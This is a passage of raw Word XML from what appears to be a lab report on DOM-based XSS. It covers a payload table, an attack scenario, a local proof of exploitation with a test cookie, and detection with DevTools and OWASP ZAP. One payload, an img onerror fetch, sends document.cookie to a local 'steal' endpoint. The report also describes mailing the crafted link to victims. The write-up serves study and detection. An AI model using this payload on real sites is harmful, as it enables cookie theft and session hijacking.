              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>document.cookie</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>)&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77BEE2E6" w14:textId="1430FC9B" w:rsidR="00F35EF5" w:rsidRDefault="00F35EF5">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t xml:space="preserve">Works, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>onerror</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t xml:space="preserve"> fires when the broken image fails to load.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F35EF5" w14:paraId="5CF21691" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="137BAE61" w14:textId="76F08287" w:rsidR="00F35EF5" w:rsidRDefault="00F35EF5" w:rsidP="00F35EF5">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0ADD8AB2" w14:textId="2BE8AF6F" w:rsidR="00F35EF5" w:rsidRDefault="00F35EF5" w:rsidP="00F35EF5">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>img</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>src</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
              </w:rPr>
              <w:t>=x onerror="fetch('http://127.0.0.1:9000/steal?c='+encodeURIComponent(document.cookie))"&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="701E7EC4" w14:textId="342F87F2" w:rsidR="00F35EF5" w:rsidRDefault="00F35EF5" w:rsidP="00F35EF5">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>Realistic attack, silently exfiltrate the victim’s cookie to an attacker controlled server instead of showing an alert.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7CD17322" w14:textId="159512D8" w:rsidR="003C4509" w:rsidRDefault="003C4509">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FE0BF10" w14:textId="27CD31AF" w:rsidR="00F35EF5" w:rsidRPr="0079772A" w:rsidRDefault="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="156082" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0079772A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="156082" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.1 Attack scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EA99E0" w14:textId="77777777" w:rsidR="00F35EF5" w:rsidRDefault="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7997A4BF" w14:textId="18A273F4" w:rsidR="00F35EF5" w:rsidRDefault="00F35EF5" w:rsidP="00F35EF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Attacker crafts a link to the real site with the malicious payload hidden in the URL fragment (#q=…)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C80A96" w14:textId="1954BD37" w:rsidR="00F35EF5" w:rsidRDefault="00F35EF5" w:rsidP="00F35EF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Link is sent to the victim via email, chat or forum post</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052F398F" w14:textId="2DE46949" w:rsidR="00F35EF5" w:rsidRDefault="00F35EF5" w:rsidP="00F35EF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>The victim clicks the link. Because the payload lives only in the fragment, it is never sent to the server (nothing unusual appears in server logs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284E068C" w14:textId="49456A13" w:rsidR="00F35EF5" w:rsidRDefault="00F35EF5" w:rsidP="00F35EF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>The page loads normally; the vulnerable script read the fragment and injects the payload into the DOM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A94796" w14:textId="150A6B44" w:rsidR="00F35EF5" w:rsidRDefault="00F35EF5" w:rsidP="00F35EF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">The injected script executes in the victim’s browser, under the real site’s origin, and sends </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the attacker server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C55DBC" w14:textId="4E6CD155" w:rsidR="00F35EF5" w:rsidRDefault="00F35EF5" w:rsidP="00F35EF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>The attacker now holds the victim’s session cookie and can potentially hijack their session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF03EF0" w14:textId="705B2C2C" w:rsidR="00F35EF5" w:rsidRPr="0079772A" w:rsidRDefault="00F35EF5" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="156082" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0079772A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="156082" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.2 Proof of exploitations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308F7854" w14:textId="4EE26BF3" w:rsidR="00F35EF5" w:rsidRDefault="00F35EF5" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">A local server (attacker_server.py) was used to represent the attacker’s collection endpoint. A test cookie was set in the </w:t>
      </w:r>
      <w:r w:rsidR="002910BD">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>HTML code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> = “session=SECRET123”) and the payload above was submitted through the search box.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D106C96" w14:textId="01235311" w:rsidR="002910BD" w:rsidRDefault="002910BD" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002910BD">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="433675A3" wp14:editId="3F1DD5EC">
            <wp:extent cx="5943600" cy="1536065"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="113294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4766" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1536065"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F1376A" w14:textId="77777777" w:rsidR="002910BD" w:rsidRDefault="002910BD" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42279468" w14:textId="21E6411E" w:rsidR="002910BD" w:rsidRPr="00E708EA" w:rsidRDefault="002910BD" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E708EA">
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Figure 1. The payload is parsed and executed as real HTML rather than displayed as text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09378F44" w14:textId="05F6997D" w:rsidR="00F35EF5" w:rsidRDefault="002910BD" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="606B0023" wp14:editId="6CABCFF9">
            <wp:extent cx="5943600" cy="3073400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="90241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10083" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3073400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5943E7" w14:textId="5BD683E9" w:rsidR="002910BD" w:rsidRPr="00E708EA" w:rsidRDefault="002910BD" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E708EA">
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Figure 2. The victim’s Cookie successfully exfiltrated into the attacker server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49341B8A" w14:textId="77777777" w:rsidR="002910BD" w:rsidRDefault="002910BD" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="063CCBE7" w14:textId="2EA56B36" w:rsidR="002910BD" w:rsidRPr="0079772A" w:rsidRDefault="002910BD" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="156082" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0079772A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="156082" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4. Detection and Tracing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B43D82" w14:textId="77777777" w:rsidR="002910BD" w:rsidRDefault="002910BD" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D0D87A5" w14:textId="5F4ED979" w:rsidR="002910BD" w:rsidRDefault="002910BD" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>DOM-based XSS is harder to detect than reflected or stored XSS because the malicious payload never appears in any request to the server – it only exists and executes inside the browser. Detection therefore has to happen client-side.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AB7BA8" w14:textId="77777777" w:rsidR="002910BD" w:rsidRDefault="002910BD" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BB1A795" w14:textId="40D84D81" w:rsidR="002910BD" w:rsidRPr="004D08E1" w:rsidRDefault="002910BD" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="156082" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D08E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="156082" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 Browser </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D08E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="156082" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DevTools</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="48BC08AF" w14:textId="77AB3BED" w:rsidR="002910BD" w:rsidRDefault="002910BD" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">The console panel in Chrome </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>DevTools</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> was used to observ</w:t>
      </w:r>
      <w:r w:rsidR="0079772A">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">e the page’s </w:t>
      </w:r>
      <w:r w:rsidR="004D08E1">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>behavior</w:t>
      </w:r>
      <w:r w:rsidR="0079772A">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> directly: the cookie is set automatically by the page itself (for testing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F6FB77" w14:textId="77777777" w:rsidR="0079772A" w:rsidRDefault="0079772A" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DFF7D09" w14:textId="1947E32A" w:rsidR="0079772A" w:rsidRDefault="0079772A" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75E2908E" wp14:editId="2CC6A49D">
            <wp:extent cx="5943600" cy="1381125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="15595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8491" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1381125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="082EACDF" w14:textId="3123282E" w:rsidR="0079772A" w:rsidRPr="00E708EA" w:rsidRDefault="0079772A" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E708EA">
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Fig 3 before the attack happens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9C43D0" w14:textId="1FB93203" w:rsidR="0079772A" w:rsidRDefault="0079772A" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EC06912" wp14:editId="1C4ED639">
            <wp:extent cx="5943600" cy="1065530"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="149149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9783" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1065530"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F75C55" w14:textId="2B227D2A" w:rsidR="0079772A" w:rsidRPr="00E708EA" w:rsidRDefault="0079772A" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E708EA">
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Fig 4. After the malicious payload is injected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B231D54" w14:textId="77777777" w:rsidR="0079772A" w:rsidRDefault="0079772A" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4477C68E" w14:textId="77777777" w:rsidR="00E708EA" w:rsidRDefault="0079772A" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>4.1 Intercepting proxy (OWASP ZAP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70345F2E" w14:textId="77777777" w:rsidR="00E708EA" w:rsidRDefault="00E708EA" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59CA5485" w14:textId="2228C7CF" w:rsidR="0079772A" w:rsidRDefault="00E708EA" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>While the initial payload is invisible to network monitoring (it never leaves the browser as a request), the exploit’s exfiltration step does generate a real outbound HTTP request once triggered, Routing the browser through OWASP ZAP as an intercepting proxy captures this request, providing network-level evidence of the attack in progress</w:t>
      </w:r>
      <w:r w:rsidR="0079772A">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="0079772A">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Download </w:t>
      </w:r>
      <w:r w:rsidR="0079772A" w:rsidRPr="0079772A">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>https://www.zaproxy.org/download/</w:t>
      </w:r>
      <w:r w:rsidR="0079772A">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="0079772A">
        <w:rPr>
          <w:noProof/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35DE681D" wp14:editId="2F4585A5">
            <wp:extent cx="5943600" cy="4550410"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="5475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754" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4550410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BD8207" w14:textId="6A5CF0C8" w:rsidR="0079772A" w:rsidRDefault="0079772A" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E708EA">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Fig 5 inside Zap exploring the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E708EA">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E708EA" w:rsidRPr="00E708EA">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72168048" w14:textId="77777777" w:rsidR="00E708EA" w:rsidRDefault="00E708EA" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EBAAF4A" w14:textId="669A18A4" w:rsidR="00E708EA" w:rsidRPr="00E708EA" w:rsidRDefault="00E708EA" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
